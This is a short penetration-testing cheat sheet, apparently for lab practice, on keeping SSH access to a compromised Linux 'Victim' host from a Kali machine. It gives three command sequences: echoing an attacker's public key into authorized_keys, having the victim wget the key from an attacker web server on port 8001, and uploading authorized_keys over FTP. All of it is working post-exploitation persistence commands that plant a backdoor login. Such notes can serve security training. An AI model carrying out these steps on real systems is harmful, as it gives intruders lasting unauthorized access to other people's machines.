=================================== 
Persist keys to Linux

# Kali
mkdir ~/lab/bob/.ssh/ 
cd ~/lab/bob/.ssh/ 
ssh-keygen -f ~/lab/bob/.ssh/id_rsa  
id_rsa        ..private key   
id_rsa.pub    ..public key   
cat ~/lab/bob/.ssh/id_rsa.pub  

# Victim  
cd /home/bob/.ssh/ 
echo ssh-rsa AAAAB3NzaC1Tz8a4ELx2k= kali@kali >> authorized_keys  
chmod 0700 /home/bob/.ssh
chmod 0600 /home/bob/.ssh/authorized_keys

# Kali  
chmod 600 ~/lab/bob/.ssh/id_rsa 
ssh -i ~/lab/bob/.ssh/id_rsa bob@192.168.200.5 

=================================== 
Simplified. Make keys. Reconnect with ssh

# Kali
mkdir matt
cd matt 
ssh-keygen -f matt
webup 8001

# Victim
cd /home/matt
mkdir .ssh
cd .ssh
wget 192.168.162.46:8001/matt.pub
mv matt.pub authorized_keys

# Kali
chmod 600 matt
ssh -i matt matt@192.168.200.5



=================================== 
Persist Linux Keys via FTP

cat ~/lab/bob/.ssh/id_rsa.pub ~/lab/bob/authorized_keys 
cd ~/lab/bob/
ftp 192.168.200.5
user 
pass 
cd bob        ..Go to bob home directory
mkdir .ssh    ..Create new .ssh directory 
cd .ssh 
put authorized_keys 
exit 
ssh -i ~/lab/bob/.ssh/id_rsa bob@192.168.200.5 

